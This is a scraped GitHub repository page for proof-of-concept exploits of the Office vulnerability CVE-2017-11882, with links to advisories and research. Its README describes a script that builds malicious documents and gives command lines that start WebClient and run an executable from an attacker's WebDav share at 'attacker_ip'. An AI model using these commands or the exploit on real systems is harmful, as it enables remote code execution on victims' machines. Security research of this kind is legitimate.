Skip to content

rxwx/CVE-2017-11882

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code
This branch is 3 commits ahead of embedi:master.

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2017-11882

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.

The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff

Attacker controlled binary path should be a UNC network path:

\\attacker_ip\ff\1.exe

Usage

webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

About

Proof-of-Concept exploits for CVE-2017-11882

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%